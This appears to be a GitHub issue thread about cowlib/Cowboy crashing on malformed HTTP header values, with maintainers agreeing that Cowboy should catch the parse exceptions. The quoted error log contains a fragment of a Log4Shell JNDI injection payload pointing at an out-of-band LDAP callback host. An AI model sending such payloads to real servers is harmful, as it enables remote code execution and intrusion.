Crash on malformed Connection header

[zinid]

cowlib parser crashes (due to function_clause) on malformed values of Connection header. This typically looks like:

exception error: no function clause matching
                     cow_http_hd:token_ci_list_sep(<<"{jndi:ldap://127.0.0.1#wecd4kxqkow4d2sr4xangidqbzpv4i2c2zqo3v6ackocbf2epm7dbr2kgm.oob.li:1389/a}">>,
                                                   [<<"$">>]) (...)

The problem has recently worsened due to appearance of log4j exploits (CVE-2021-44228). For example, we get around 30k related cowboy crashes per week, so this is not a cosmetic issue anymore, as it creates burden for the OPS team. Another complication is that this malformed value can be put by the exploiting script into any header, so it seems like not only Connection header is affected: as explained in the vulnerability description, it can be put into User-Agent, Authorization and so on.

Can this somehow be resolved?

P.S. I'm not quite sure whether this problem relates to cowlib or cowboy. Sorry if I opened the ticket in a wrong repository.

[essen]

Cowboy! I think Cowlib crashing is fine, but Cowboy should catch the exceptions for the headers that it parses instead of erroring out noisely like this.

[zinid]

Okay, I will try to prepare a PR to the Cowboy repository ASAP.